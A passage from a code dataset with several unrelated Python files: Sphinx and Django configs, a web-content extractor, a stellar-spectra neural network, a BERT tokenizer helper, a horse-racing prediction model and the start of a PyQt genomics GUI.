\"sphinx_rtd_theme\"\nhtml_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\nhtmlhelp_basename = \"bgendoc\"\n","sub_path":"doc/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"441452212","text":"from django.conf.urls import url\nfrom .views import TweetRUDView, TweetAPIView, UserCreateAPIView\nfrom tweets import views as main_views\n\nurlpatterns = [\n url(r'signup/$', main_views.signup, name='signup'),\n url(r'signup/loginpage/', main_views.login, name='loginpage'),\n url(r'^$',TweetAPIView.as_view(), name='list-tweets'),\n url(r'^(?P\\d+)/$',TweetRUDView.as_view(), name='post-RUD'),\n url(r'register/',UserCreateAPIView.as_view(), name='register-users'),\n]","sub_path":"src/tweets/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"565014974","text":"import re\n\nfrom bs4 import UnicodeDammit\nfrom scrapy import Selector\n\n# 解析网页正文部分的算法实现\n\nRULE_TEXT = './text() | .//p[not(@style) or @style!=\"display: none;\"]//text()[not(ancestor::li) and not(' \\\n 'parent::script) and not(parent::a) and not(parent::style)] | .//div/text()[not(ancestor::li)] '\n\n\nclass ParseContent(object):\n EXCLU_DIVS = ['footer', 'bottom'] # 被排除的div class name\n THRESHOLD = 0.5\n\n @classmethod\n def search_content_xpath(cls, sel, exclu_divs):\n root = sel.xpath('/html/body')\n xpath = cls.recursion('/html/body', root, cls.THRESHOLD, exclu_divs + cls.EXCLU_DIVS)\n print('----------------content path is %s' % xpath)\n return xpath\n\n @classmethod\n def guess_content(cls, div_sel):\n # 验证是不是内容div。。。还没想到好办法\n ct = div_sel.extract()\n if not ct:\n return False\n # add other condition here\n return True\n\n @classmethod\n def recursion(cls, path, root_node, threshold, EXCLU_DIVS):\n divs = root_node.xpath('./div')\n parent_len = cls.get_text_len(root_node)\n max_div_index = 0\n max_len = 0\n if divs.__len__() == 0:\n return path\n for i in range(divs.__len__()):\n div = divs[i]\n class_name = div.xpath('./@class').extract_first()\n if class_name in EXCLU_DIVS:\n continue\n _len = cls.get_text_len(div)\n if _len > max_len:\n max_len = _len\n max_div_index = i\n max_div = divs[max_div_index]\n if max_len / (parent_len+1) < threshold:\n return path\n else:\n div_class = max_div.xpath('./@class').extract_first()\n div_id = max_div.xpath('./@id').extract_first()\n pos = str(max_div_index+1)\n if div_class:\n pos = '@class=\"' + div_class + '\"'\n elif div_id:\n pos = '@id=\"' + div_id + '\"'\n return cls.recursion(path + '/div[' + pos + ']', max_div, threshold, EXCLU_DIVS)\n\n @classmethod\n def get_text_len(cls, label):\n texts = label.xpath(RULE_TEXT).extract()\n text_join = ''.join(texts)\n text_join = re.sub('[^\\u4e00-\\u9fa5]', '', text_join)\n return len(text_join)\n","sub_path":"enterprise_spider/scraper/parse_content.py","file_name":"parse_content.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"20344202","text":"import numpy as np\nimport os.path\nfrom random import random\nfrom matplotlib.pyplot import *\nfrom pybrain.tools.shortcuts import buildNetwork\nfrom pybrain.structure import *\nfrom pybrain.datasets import SupervisedDataSet\nfrom pybrain.supervised.trainers import BackpropTrainer\n\n# This function is not necessary for the ANN creation, it is 
merely\n# for diagnostic purposes to periodically check how the ANN is doing\n# by testing it on a selection of random data. It will print out,\n# overall, how well the ANN is doing and show 20 randomly selected\n# spectra and their results after being fed through the ANN.\ndef testANN():\n correct = 0\n printSample = 0\n # Loop through the testing input data (distinct from the\n # training input data) and feed that through the network.\n # Then, if we meet some random condition (which allows us\n # to print out different results each time we test) then\n # print out the ANN results for that testing sample.\n for i in range(-1, -(numbOfFiles-numbOfSamples), -1):\n test = net.activate(inp[i]) # Resultant vector from the ANN\n compare = out[i] # Expected vector for the input spectra\n # If we meet the random condition and haven't already printed out\n # 20 random test results, let's print this particular spectra out.\n if printSample < 20 and random() < 0.05:\n prob = sigmoid(test)/sum(sigmoid(test)) # Sigmoid and normalize our vector\n pos = np.argsort(-prob)[:3] # Sort it and choose the three highest components\n # Now print out information about how this test spectra compares, indicating\n # the three most likely spectra as chosen by the ANN, their percentages, and\n # the correct answer.\n print('Testing Result', -i, '-',\n 'Expected:', slist[np.where(compare == max(compare))[0][0]],\n flush = True, end = '')\n print(' Computed: ',\n slist[pos[0]], ' ',\n str(round(prob[pos[0]]*100,1))[:4], '% ',\n slist[pos[1]], ' ',\n str(round(prob[pos[1]]*100,1))[:4], '% ',\n slist[pos[2]], ' ',\n str(round(prob[pos[2]]*100,1))[:4], '% ',\n sep = '', flush = True)\n printSample += 1\n # Check if the ANN was right for this spectra and increase the correct\n # counter if it was.\n equality = np.all((test == max(test)) == (compare == max(compare)))\n if (equality == True): correct += 1\n # Print out how many of the test spectra it got right at this stage.\n print('Testing Data Results:', correct, '/', numbOfFiles-numbOfSamples, flush = True)\n return correct\n\n# This is run once and when the ANN is finally done being trained. It will apply\n# the ANN to the testing portion of the data and see how many the ANN was able\n# to get correct. 
This will return the number of correct classifications, the\n# total number that were correct in each spectral class and the total number of\n# spectra in each class.\ndef finalTest():\n correct = 0\n categoryCorrect = [0]*len(slist)\n categoryAll = np.zeros(len(slist))\n for i in range(-1, -(numbOfFiles-numbOfSamples), -1):\n test = net.activate(inp[i])\n compare = out[i]\n categoryAll[compare == 1] += 1\n equality = np.all((test == max(test)) == (compare == max(compare)))\n if (equality == True):\n correct += 1\n prob = sigmoid(test)/sum(sigmoid(test))\n pos = np.argsort(-prob)[0]\n categoryCorrect[pos] += 1\n print('Testing Data Results:', correct, '/', numbOfFiles-numbOfSamples, flush = True)\n return correct, categoryCorrect, categoryAll\n\n# A simple sigmoid function defined for normalizing values\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\nprint('Start...', flush = True)\n\n##\n# DEFINE VARIABLES\n#\n\nPATH = 'PUT_IN_PATH_TO_ANN_DATA'\nFILE = 'ANN_Data.txt'\nslist = ['O', 'B', 'A', 'F', 'G', 'K', 'M', 'L', 'T']\nnumbOfFiles = 8000 # The total number of input spectra to use in creating this ANN\nnumbOfSamples = 6000 # The total number of input spectra to use solely for training\nnumbOfTraining = 100 # The number of times to train the spectra on the training sample\n\ninp = np.array([])\nout = np.array([])\n\n##\n# ANN SETUP\n#\n\n# Define a network with 4500 input nodes, one for each spectrum resolution element,\n# a single hidden layer with 100 nodes, and an output layer with 9 nodes (one for\n# each of the possible spectral types). This represents a probabilistic neural network.\n# This network uses bias nodes and applies a sigmoid function along the way.\nnet = buildNetwork(4500, 100, 9, bias = True, hiddenclass = SigmoidLayer)\nds = SupervisedDataSet(4500, 9)\n\n# Read in the input data file. This is a list where on each line is the flux measured\n# at each wavelength and the last value in the line is that spectrum's known spectral type.\n# This is all extracted below.\nf = 0; c = 0\nwith open(PATH+FILE) as infile:\n for line in infile:\n line = line.strip()\n stype = line[-1]\n line = np.asarray(line[0:-3].split(', ')).astype(np.float)\n line = line[:4500]\n # Only use spectra which are not just noise\n if (np.mean(line) >= 4):\n # Remove any values in the spectra which are obviously wrong by zeroing them\n line[np.abs(line) > 1000] = 0\n if (f < numbOfSamples):\n # Add the current spectrum and its known spectral type as a 9-element\n # vector. The spectrum is scaled down by 1000.\n ds.addSample( line/1000, [(stype == s)*1 for s in slist])\n # Put the spectra and spectral type into our own arrays for later\n inp = np.append(inp, line/1000)\n out = np.append(out, [(stype == s)*1 for s in slist])\n f += 1 # The number of spectra used so far\n c += 1 # The number of spectra read in so far\n if (c % 100 == 0): print(c, f, flush = True)\n if (f >= numbOfFiles):\n break\n\n##\n# ANN TRAINING\n#\n\nprint('Training ANN...', flush = True)\n\nout = out.reshape((f,9))\ninp = inp.reshape((f,4500))\ntrainer = BackpropTrainer(net, ds, learningrate = 0.05)\nerr = []\n# Begin training the requested number of times. Every tenth\n# training session, test the ANN to see how it is coming along.\nfor i in range(numbOfTraining):\n err.append(trainer.train())\n print('Training Session', i, flush = True)\n if (i % 10 == 0):\n print('Training Error:', err[-1], flush = True)\n testANN()\n\n# Now the training is done, we need to do a final test of\n# the data and analyze how well the ANN did at the end.\ncorrect, categoryCorrect, categoryAll = finalTest()\nprint(correct)\n# Convert categoryCorrect to the percentage of each class classified correctly\nfor i in range(len(categoryCorrect)):\n print(categoryCorrect[i], categoryAll[i])\n if (categoryAll[i] > 0):\n categoryCorrect[i] = categoryCorrect[i] / categoryAll[i] * 100\n else:\n categoryCorrect[i] = np.nan\n\n\n##\n# OUTPUT\n#\n\nfilename = 'output_'\ni = 1\nwhile os.path.isfile(filename + str(i) + '.txt'):\n i += 1\nfilename += str(i)+'.txt'\nprint('Printing to ' + filename, flush = True)\n\n# Print information concerning the total accuracy of the ANN\nfile = open(filename,'w')\nfile.write('Final accuracy: ' + str(correct) + '/' + str(numbOfFiles - numbOfSamples) + '\\n')\nfile.write('Accuracy per category: ')\nfor i in categoryCorrect: file.write(str(i)+', ')\nfile.write('\\n\\n')\n\n# Print out the ANN structure, just for fun\nfor mod in net.modules:\n for conn in net.connections[mod]:\n file.write(mod.name + ' -> ' + conn.outmod.name + ', ' + str(mod.dim) + ' x ' + str(conn.outmod.dim) + '\\n')\n x = np.array(conn.params).reshape(mod.dim,conn.outmod.dim)\n for i in range(mod.dim):\n for j in range(conn.outmod.dim):\n file.write(str(x[i,j]) + ' ')\n file.write('\\n')\n file.write('\\n')\n\nfile.close()\n\n\nprint('Done...', flush = True)\n\n","sub_path":"SpectraClassifyANN.py","file_name":"SpectraClassifyANN.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"315347545","text":"from transformers import BertTokenizer\r\n# BERT tokenizer helper: mainly converts sentences into token ids\r\nclass BertTokenHelper(object):\r\n def __init__(self,bert_dir):\r\n self.tokenizer = BertTokenizer.from_pretrained(bert_dir)\r\n special_tokens_dict = {'additional_special_tokens':['[url]','[num]','[word]']}#embeddings for these added tokens are randomly initialized\r\n self.tokenizer.add_special_tokens(special_tokens_dict)\r\n print(\"Load bert vocabulary finished\")\r\n def pad_token_id(self):\r\n return self.tokenizer.pad_token_id\r\n def batch_bert_id(self,instext):\r\n outputs = self.tokenizer.batch_encode_plus(instext,add_special_tokens=True)\r\n input_ids = outputs.data['input_ids']\r\n token_type_ids = outputs.data['token_type_ids']\r\n attention_mask = outputs.data['attention_mask']\r\n return input_ids,token_type_ids,attention_mask","sub_path":"titlecls_project/new_moudle/bertToken.py","file_name":"bertToken.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"371490676","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\n'''\nHernández Guillén Brenda Itzel, 315291810\nTaller de Herramientas Computacionales\n\n'''\nFibonacci = [1,1]\n\n'''def fibonacci(n):\n a = 1\n b = 1\n i = 2\n while (i<=n):\n f = a + b\n a = b\n b = f\n i = i + 1\n return(a)\n'''\ndef fib(n):\n # Extend the list to the first n Fibonacci numbers and return it\n for i in range(2, n):\n Fibonacci.append(Fibonacci[i-1] + Fibonacci[i-2])\n return Fibonacci\n","sub_path":"Clases/Programas/Tarea05/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"526038422","text":"import os\nimport time\n\nimport 
numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom utils import cleanse_feature, cleanse_sample, fill_nan, replace_invalid, \\\n process_name, process_class, process_course, process_going, \\\n standardize, slice_naive_data, fc_layer, bilinear_layer, cross_entropy, rmse, normalize\nfrom backtesting import backtest\n\n\nclass RacingPredictor:\n \"\"\"\n Base class for building a horse racing prediction model.\n \"\"\"\n def __init__(self,\n file='',\n batch_size=512,\n num_epochs=None,\n iterations=3e5,\n learning_rate=5e-4):\n \"\"\"\n Initializer of .\n\n :param file: Relative directory of data in csv format.\n \"\"\"\n self.file = os.path.join('./', file)\n self.data = pd.read_csv(self.file)\n\n self.batch_size = batch_size\n self.num_epochs = num_epochs\n self.iterations = int(iterations)\n self.learning_rate = learning_rate\n\n with tf.variable_scope(name_or_scope='init'):\n self.training = tf.placeholder(tf.bool, name='training')\n\n self._input = tf.placeholder(tf.float32, [None, 13], name='input')\n self._win = tf.placeholder(tf.float32, [None, 16], name='win')\n\n def __str__(self):\n return str(self.data.shape)\n\n @staticmethod\n def pre_process(file, persistent=False):\n \"\"\"\n To pre-process the data for further operation(s).\n\n :param file: Path to a csv file.\n :param persistent: A boolean variable indicating whether to make the pre-processed data persistent locally.\n \"\"\"\n # create a duplicate of data\n print('start pre-processing...')\n duplicate = pd.read_csv(file)\n\n # define keys for detecting duplicates\n keys = ['rdate', 'rid', 'hid']\n # define indices of rows to be removed\n indices = []\n # cleanse invalid sample(s)\n print('cleansing invalid sample...')\n duplicate = cleanse_sample(duplicate, keys=keys, indices=indices)\n\n # define rules for dropping feature\n rules = [ # useless features\n 'horsenum', 'rfinishm', 'runpos', 'windist', 'win', 'place', '(rm|p|m|d)\\d+',\n # features containing too many NANs\n 'ratechg', 'horseweightchg', 'besttime', 'age', 'priority', 'lastsix', 'runpos', 'datediff',\n # features which are difficult to process\n 'gear', 'pricemoney'\n ]\n # eliminate useless features\n print('eliminating useless features...')\n duplicate = cleanse_feature(duplicate, rules=rules)\n\n # specify columns to be filled\n columns = ['bardraw', 'finishm', 'exweight', 'horseweight', 'win_t5', 'place_t5']\n # specify corresponding methods\n methods = [('constant', 4), ('constant', 1e5), ('constant', 122.61638888121101),\n ('constant', 1106.368874062333), ('constant', 26.101661368452852), ('constant', 6.14878956518161)]\n # fill nan value(s)\n print('filling nans...')\n duplicate = fill_nan(duplicate, columns=columns, methods=methods)\n\n # specify columns to be replaced\n columns = ['bardraw', 'finishm', 'exweight', 'horseweight']\n # specify schema(s) of replacement\n values = [(0, 14), (0, 1e5), (0, 122.61638888121101), (0, 1106.368874062333)]\n # replace invalid value(s)\n print('replacing invalid values...')\n duplicate = replace_invalid(duplicate, columns=columns, values=values)\n\n # convert 'finishm' into 'velocity'\n print('generating velocity...')\n duplicate['velocity'] = 1e4 * duplicate['distance'] / duplicate['finishm']\n\n # apply target encoding on 'class'\n print('processing class...')\n duplicate = process_class(duplicate)\n # apply target encoding on 'jname' and 'tname'\n print('processing jname and tname...')\n duplicate = process_name(duplicate)\n # apply target encoding on 'venue' and 'course'\n print('processing 
venue and course...')\n duplicate = process_course(duplicate)\n # apply target encoding on 'track' and 'going'\n print('processing track and going...')\n duplicate = process_going(duplicate)\n\n # conduct local persistence\n if persistent:\n # set index before saving\n duplicate.set_index('index', inplace=True)\n print('saving result...')\n duplicate.to_csv(file.replace('.csv', '_modified.csv'))\n\n return duplicate\n\n def model(self):\n \"\"\"\n To generate a model.\n\n :return: The estimation of race finish time of a single horse in centi second\n \"\"\"\n with tf.variable_scope(name_or_scope='race_predictor'):\n fc_0 = fc_layer(tf.layers.flatten(self._input), 512, training=self.training, name='fc_0')\n\n bi_0 = bilinear_layer(fc_0, 512, training=self.training, name='bi_0')\n bi_1 = bilinear_layer(bi_0, 512, training=self.training, name='bi_1')\n\n win_output = tf.nn.softmax(logits=tf.layers.dense(bi_1, units=16, activation=None, use_bias=False),\n name='win_output')\n\n return win_output\n\n def train(self):\n # pre-process data\n try:\n modify = pd.read_csv(self.file.replace('.csv', '_modified.csv'))\n except FileNotFoundError:\n modify = RacingPredictor.pre_process(self.file, persistent=True)\n\n # drop outdated data\n # modify = modify[:][[val > '2015' for val in modify['rdate']]]\n # perform standardization\n modify = standardize(modify)\n\n # slice data\n x_train, y_train = slice_naive_data(modify)\n\n # define validation set\n validation = None\n x_test, y_test = None, None\n\n # generate model\n win = self.model()\n win_summary = tf.summary.histogram('win_summary', win)\n\n with tf.variable_scope(name_or_scope='optimizer'):\n # loss function\n # total_loss = tf.reduce_mean(tf.reduce_sum(cross_entropy(self._win, win), axis=-1), name='total_loss')\n total_loss = tf.reduce_mean(rmse(self._win, win), name='total_loss')\n loss_summary = tf.summary.scalar('loss_summary', total_loss)\n\n # optimizer\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_ops = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(total_loss)\n\n # configuration\n if not os.path.isdir('save'):\n os.mkdir('save')\n config = tf.ConfigProto()\n\n print('Start training')\n with tf.Session(config=config) as sess:\n # initialization\n sess.run(tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()))\n\n # saver\n optimal = np.inf\n saver = tf.train.Saver(max_to_keep=5)\n\n # store the network graph for tensorboard visualization\n writer = tf.summary.FileWriter('save/network_graph', sess.graph)\n merge_op = tf.summary.merge([win_summary, loss_summary])\n\n # data set\n queue = tf.train.slice_input_producer([x_train, y_train],\n num_epochs=self.num_epochs, shuffle=True)\n x_batch, y_batch = tf.train.batch(queue, batch_size=self.batch_size, num_threads=1,\n allow_smaller_final_batch=False)\n\n # enable coordinator\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess, coord)\n\n try:\n for i in range(self.iterations):\n x, y = sess.run([x_batch, y_batch])\n\n _, loss, sm = sess.run([train_ops, total_loss, merge_op],\n feed_dict={self.training: True, self._input: x, self._win: y})\n\n if i % 100 == 0:\n print('iteration %d: loss = %f' % (i, loss))\n writer.add_summary(sm, i)\n writer.flush()\n if i % 500 == 0:\n if validation is None:\n # read validation set\n validation = pd.read_csv('new_data/test_new.csv')\n validation = cleanse_sample(validation, keys=['rdate', 'rid', 'hid'], indices=[])\n # slice 
testing data\n x_test, y_test = slice_naive_data(\n standardize(pd.read_csv('new_data/test_new_modified.csv')))\n\n prob, loss = sess.run([win, total_loss],\n feed_dict={self.training: False, self._input: x_test, self._win: y_test})\n\n validation['winprob'] = prob[:, 1]\n validation['2ndprob'] = prob[:, 2]\n validation['3rdprob'] = prob[:, 3]\n\n validation['winprob'] = validation.apply(normalize, axis=1, df=validation, key='winprob')\n validation['2ndprob'] = validation.apply(normalize, axis=1, df=validation, key='2ndprob')\n validation['3rdprob'] = validation.apply(normalize, axis=1, df=validation, key='3rdprob')\n validation['plaprob'] = validation['winprob'] + validation['2ndprob'] + validation['3rdprob']\n\n fixratio = 5e-4\n mthresh = 2.5\n print(\"Getting win stake...\")\n validation['winstake'] = fixratio * (validation['winprob'] * validation['win_t5'] > mthresh)\n print(\"Getting place stake...\")\n validation['plastake'] = fixratio * (validation['plaprob'] * validation['place_t5'] > mthresh)\n\n result = backtest(validation, 'winprob', 'plaprob', 'winstake', 'plastake')\n\n if 0.35 * result['AverageRMSEwin'] + 0.65 * result['AverageRMSEpalce'] < optimal:\n optimal = 0.35 * result['AverageRMSEwin'] + 0.65 * result['AverageRMSEpalce']\n print('save at iteration %d with average loss of %f' % (i, optimal))\n saver.save(sess, 'save/%s/model' %\n (time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time()))))\n\n except tf.errors.OutOfRangeError:\n print('Done training -- epoch limit reached')\n saver.save(sess, 'save/%s/model' %\n (time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time()))))\n writer.close()\n finally:\n coord.request_stop()\n\n coord.join(threads)\n\n @staticmethod\n def predict(file):\n data = pd.read_csv(file)\n data = cleanse_sample(data, keys=['rdate', 'rid', 'hid'], indices=[])\n\n # pre-process data\n try:\n modify = pd.read_csv(file.replace('.csv', '_modified.csv'))\n except FileNotFoundError:\n modify = RacingPredictor.pre_process(file, persistent=True)\n\n # perform standardization\n modify = standardize(modify)\n\n # slice data\n x_test, y_test = slice_naive_data(modify)\n\n # get graph\n graph = tf.get_default_graph()\n # session\n with tf.Session(graph=graph) as sess:\n # restore the latest model\n file_list = os.listdir('save/')\n file_list.sort(key=lambda val: val)\n loader = tf.train.import_meta_graph('save/%s/model.meta' % file_list[-2])\n\n # get input tensor\n training_tensor = graph.get_tensor_by_name('init/training:0')\n input_tensor = graph.get_tensor_by_name('init/input:0')\n win_tensor = graph.get_tensor_by_name('init/win:0')\n\n # get output tensor\n output_tensor = graph.get_tensor_by_name('race_predictor/win_output:0')\n\n # get loss tensor\n loss_tensor = graph.get_tensor_by_name('optimizer/total_loss:0')\n\n sess.run(tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()))\n loader.restore(sess, tf.train.latest_checkpoint('save/%s' % file_list[-2]))\n\n prob, loss = sess.run([output_tensor, loss_tensor],\n feed_dict={training_tensor: False, input_tensor: x_test, win_tensor: y_test})\n\n data['winprob'] = prob[:, 1]\n data['2ndprob'] = prob[:, 2]\n data['3rdprob'] = prob[:, 3]\n\n data['winprob'] = data.apply(normalize, axis=1, df=data, key='winprob')\n data['2ndprob'] = data.apply(normalize, axis=1, df=data, key='2ndprob')\n data['3rdprob'] = data.apply(normalize, axis=1, df=data, key='3rdprob')\n data['plaprob'] = data['winprob'] + data['2ndprob'] + data['3rdprob']\n\n fixratio = 1e-4\n mthresh = 2.5\n\n 
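# Flat-staking rule: back a runner only when its estimated probability times the t-minus-5 odds clears the mthresh margin; every qualifying bet stakes the same fixed fraction (fixratio) of the bankroll.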
print(\"Getting win stake...\")\n data['winstake'] = fixratio * (data['winprob'] * data['win_t5'] > mthresh)\n print(\"Getting place stake...\")\n data['plastake'] = fixratio * (data['plaprob'] * data['place_t5'] > mthresh)\n\n result = backtest(data, 'winprob', 'plaprob', 'winstake', 'plastake')\n\n return result\n\n\ndef main():\n # read data from disk\n # model = RacingPredictor('../Data/HR200709to201901.csv', iterations=1.5e5, learning_rate=1e-3, batch_size=256)\n\n # train\n # model.train()\n\n # predict\n RacingPredictor.predict('new_data/HR201910W2.csv')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Deep_Model/naive_model_backup.py","file_name":"naive_model_backup.py","file_ext":"py","file_size_in_byte":13950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"579433487","text":"__author__ = 'milescsmith'\n__author_email__ = 'mileschristiansmith@gmail.com'\n\n# TODO: figure out how to use QThreads and move a lot of this into a thread so the GUI stays responsive and we can\n# cancel commands\n\nimport sys\nimport os\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nimport GFFextractor\n\n# this is what GENCODE had listed for GFF3 biotypes as of May 2016:\nbiotypes = ['IG_C_gene','IG_D_gene','IG_J_gene','IG_LV_gene','IG_V_gene','TR_C_gene','TR_J_gene','TR_V_gene',\n 'TR_D_gene','IG_C_pseudogene','IG_J_pseudogene','IG_V_pseudogene','TR_V_pseudogene','TR_J_pseudogene',\n 'Mt_tRNA','miRNA','misc_RNA','rRNA','scRNA','snRNA','snoRNA','ribozyme','sRNA','scaRNA','tRNA_pseudogene',\n 'snoRNA_pseudogene','snRNA_pseudogene','scRNA_pseudogene','rRNA_pseudogene','misc_RNA_pseudogene',\n 'miRNA_pseudogene','TEC','nonsense_mediated_decay','non_stop_decay','retained_intron','protein_coding',\n 'processed_transcript','non-coding','ambiguous_orf','sense_overlapping','antisense','known_ncrna',\n 'pseudogene','processed_pseudogene','polymorphic_pseudogene','retrotransposed',\n 'transcribed_processed_pseudogene','transcribed_unprocessed_pseudogene','transcribed_unitary_pseudogene',\n 'translated_unprocessed_pseudogene','unitary_pseudogene','unprocessed_pseudogene','artifact','lincRNA',\n 'macro_lncRNA','LRG_gene','3prime_overlapping_ncRNA','disrupted_domain','vaultRNA',\n 'bidirectional_promoter_lncRNA']\n\nclass dropLineEdit(QLineEdit):\n def __init__(self, title):\n super(dropLineEdit, self).__init__(title)\n self.setAcceptDrops(True)\n\n def dragEnterEvent(self, e):\n if e.mimeData().hasUrls():\n e.accept()\n else:\n e.ignore()\n\n def dropEvent(self, e):\n for url in e.mimeData().urls():\n path = url.toLocalFile()\n # if os.path.isfile(path):\n self.setText(path)\n\n\nclass MainWindow(QWidget):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n self.initUI()\n\n def initUI(self):\n # setup default arguments to pass GFFExtractor.extract to make things easier when calling\n self.gfffile = None\n self.fastafile = None\n self.outputfile = None\n self.biotype = None\n self.ebiotype = None\n self.feature_type = []\n self.gene_name = None\n self.gene_file_name = None\n self.geneIDs = None\n self.geneIDs_file = None\n self.bound = 0\n self.non_ensembl = False\n self.genelist = False\n self.nonGFF = None\n self.tss = []\n\n # create widgets to select the GFF, Fasta, and output files\n make_rocket_go_now = QPushButton('Run GFFExtractor!', self)\n make_rocket_go_now.clicked.connect(self.callGFFextractor)\n files_fbox = QFormLayout()\n files_gbox = QGroupBox('Select files:')\n options_grbox = 
QGridLayout()\n options_gbox = QGroupBox('Select options:')\n outervbox = QVBoxLayout()\n\n t_hbox = QHBoxLayout()\n b_hbox = QHBoxLayout()\n br_vbox = QVBoxLayout()\n bm_vbox = QVBoxLayout()\n bl_vbox = QVBoxLayout()\n\n self.GFFbtn = QPushButton('Select GFF file', self)\n self.GFFbtn.setFixedWidth(140)\n self.GFFLe = dropLineEdit(self)\n self.GFFLe.setMinimumWidth(400)\n self.GFFLe.setToolTip('Enter the path to and the name of the GFF file or drag the file into this box')\n\n self.Fastabtn = QPushButton('Select Fasta file', self)\n self.Fastabtn.setFixedWidth(140)\n self.FastaLe = dropLineEdit(self)\n self.FastaLe.setMinimumWidth(400)\n self.FastaLe.setToolTip('Enter the path to and the name of the Fasta file or drag the file into this box')\n\n self.Outputbtn = QPushButton('Select Output file', self)\n self.Outputbtn.setFixedWidth(140)\n self.OutputLe = dropLineEdit(self)\n self.OutputLe.setMinimumWidth(400)\n self.OutputLe.setToolTip('Enter the path to and the name of the Output file')\n\n files_fbox.addRow(self.GFFbtn, self.GFFLe)\n files_fbox.addRow(self.Fastabtn, self.FastaLe)\n files_fbox.addRow(self.Outputbtn, self.OutputLe)\n files_gbox.setLayout(files_fbox)\n\n # create widgets for the optional parameters\n self.NEcb = QCheckBox('Non-ensembl source', self)\n self.nonGFFcb = QCheckBox('non-GFF3 file', self)\n self.boundcb = QCheckBox('Use gene boundary', self)\n self.boundcb.stateChanged.connect(self.enableWidgets)\n self.boundlengthsb = QSpinBox(self)\n self.boundlengthsb.setMaximum(999999)\n self.boundlengthsb.setEnabled(False)\n self.tsscb = QCheckBox('Use transcription start site', self)\n self.tsscb.stateChanged.connect(self.enableWidgets)\n self.uppertsssb = QSpinBox(self)\n self.uppertsssb.isAccelerated()\n self.uppertsslabel = QLabel(\"nt upstream\")\n self.uppertsssb.setRange(-99999,99999)\n self.uppertsssb.setEnabled(False)\n self.lowertsssb = QSpinBox(self)\n self.lowertsslabel = QLabel(\"nt downstream\")\n self.lowertsssb.isAccelerated()\n self.lowertsssb.setRange(-99999,99999)\n self.lowertsssb.setEnabled(False)\n\n # create biotype area\n self.BioTypeChk = QCheckBox('Restrict to selected biotype(s):',\n self) # need to make everything below enable/disable on check\n self.BioTypeListWidget = QListWidget(self)\n self.BioTypeListWidget.setSelectionMode(3)\n self.BioTypeListWidget.sortItems()\n self.BioTypeBuildbtn = QPushButton('Enter biotype')\n self.ExBioTypeChk = QCheckBox('Exclude selected biotype(s):', self)\n self.ExBioTypeListWidget = QListWidget(self)\n self.ExBioTypeListWidget.setSelectionMode(3)\n\n for x in biotypes:\n QListWidgetItem(x,self.BioTypeListWidget)\n QListWidgetItem(x,self.ExBioTypeListWidget)\n\n self.BioTypeBuildbtn.setEnabled(False)\n self.BioTypeListWidget.setEnabled(False)\n self.ExBioTypeListWidget.setEnabled(False)\n\n self.BioTypeChk.stateChanged.connect(self.enableWidgets)\n self.ExBioTypeChk.stateChanged.connect(self.enableWidgets)\n self.BioTypeBuildbtn.clicked.connect(self.manualBiotype)\n\n # create the featuretype area\n self.featureTypeChk = QCheckBox('Restrict to selected feature(s):',\n self) # need to make everything below enable/disable on check\n self.featureTypeListWidget = QListWidget(self)\n self.featureTypeListWidget.setSelectionMode(3)\n self.featureTypeBuildbtn = QPushButton('Scan for features')\n self.featureTypeBuildbtn.clicked.connect(self.callGFFextractor)\n self.featureManualEntryBtn = QPushButton('Manually enter a feature type')\n self.featureManualEntryBtn.setEnabled(False)\n 
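# The manual-entry button is connected below, but it stays disabled until the 'Restrict to selected feature(s)' checkbox enables it via enableWidgets.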
self.featureManualEntryBtn.clicked.connect(self.manualFeatureName)\n self.featureClearBtn = QPushButton('Clear features')\n self.featureClearBtn.setEnabled(False)\n self.featureClearBtn.clicked.connect(self.featureTypeListWidget.clear)\n # self.ExfeatureTypeChk = QCheckBox('Exclude selected feature(s):', self)\n # self.ExfeatureTypeListWidget = QListWidget(self)\n # self.ExfeatureTypeListWidget.setSelectionMode(3)\n\n self.featureTypeListWidget.setEnabled(False)\n self.featureTypeBuildbtn.setEnabled(False)\n # self.ExfeatureTypeListWidget.setEnabled(False)\n\n self.featureTypeChk.stateChanged.connect(self.enableWidgets)\n # self.ExfeatureTypeChk.stateChanged.connect(self.enableWidgets)\n self.featureTypeBuildbtn.clicked.connect(self.callGFFextractor)\n\n # create the nametype area\n self.nameChk = QCheckBox('Restrict to selected name(s):',\n self) # need to make everything below enable/disable on check\n self.nameListWidget = QListWidget(self)\n self.nameListWidget.setSelectionMode(3)\n self.nameListWidget.setSortingEnabled(True)\n self.nameBuildbtn = QPushButton('Scan for names')\n self.nameBuildbtn.clicked.connect(self.callGFFextractor)\n self.nameManualbtn = QPushButton('Manually enter a gene')\n self.nameManualbtn.clicked.connect(self.manualGeneName)\n self.nameLoadFromFile = 